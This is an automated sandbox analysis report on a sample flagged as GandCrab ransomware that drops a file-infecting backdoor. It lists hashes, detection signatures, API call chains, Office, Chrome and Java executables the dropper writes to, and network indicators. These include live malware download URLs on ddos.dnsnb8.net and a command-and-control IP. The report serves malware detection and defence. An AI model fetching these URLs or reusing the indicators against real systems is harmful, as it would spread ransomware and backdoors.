Windows Analysis Report
SY5DeZW6pz.exe

Overview

General Information

Sample Name: SY5DeZW6pz.exe
Analysis ID: 694552
MD5: 536f2c1238ef65a64820c35d4504ce67
SHA1: 7806d51132e40728f581374a9d72d9713bff2dd0
SHA256: b6a71449958283718f01e6be9f7a9eb057479072c1cc55f26a11b033ea210271
Tags: exe
Infos:

Detection

Gandcrab, ReflectiveLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Contains functionality to determine the online IP of the system
Found Tor onion address
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Machine Learning detection for dropped file
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE file contains more sections than normal
Contains functionality to enumerate device drivers
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

barindex
Source: SY5DeZW6pz.exe Virustotal: Detection: 81% Perma Link
Source: SY5DeZW6pz.exe Metadefender: Detection: 65% Perma Link
Source: SY5DeZW6pz.exe ReversingLabs: Detection: 95%
Source: SY5DeZW6pz.exe Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k3.rar% Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar% Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/& Avira URL Cloud: Label: malware
Source: ddos.dnsnb8.net Virustotal: Detection: 5% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Virustotal: Detection: 6% Perma Link
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Metadefender: Detection: 76% Perma Link
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe ReversingLabs: Detection: 100%
Source: SY5DeZW6pz.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Joe Sandbox ML: detected
Source: 1.0.vSQshX.exe.c20000.3.unpack Avira: Label: W32/Jadtre.D
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack Avira: Label: W32/Jadtre.B
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack Avira: Label: W32/Jadtre.B
Source: 1.0.vSQshX.exe.c20000.0.unpack Avira: Label: W32/Jadtre.D
Source: 1.2.vSQshX.exe.c20000.0.unpack Avira: Label: W32/Jadtre.D
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack Avira: Label: W32/Jadtre.B
Source: 1.0.vSQshX.exe.c20000.1.unpack Avira: Label: W32/Jadtre.D
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack Avira: Label: W32/Jadtre.B
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack Avira: Label: W32/Jadtre.B
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack Avira: Label: W32/Jadtre.B
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F394950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread, 0_2_0F394950
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3962B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW, 0_2_0F3962B0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection, 0_2_0F396530
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError, 0_2_0F395210
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree, 0_2_0F395670
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3982A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F3982A0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree, 0_2_0F395880
Source: SY5DeZW6pz.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SY5DeZW6pz.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Spreading

barindex
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose, 0_2_0F396A40
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, 0_2_0F396C90
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose, 1_2_00C229E2
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00C22B8C
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe File opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior

Networking

barindex
Source: Traffic Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.4:58565 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49707 -> 63.251.106.25:799
Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.4:49708 -> 63.251.106.25:799
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com 0_2_0F396E90
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com 0_2_0F396E90
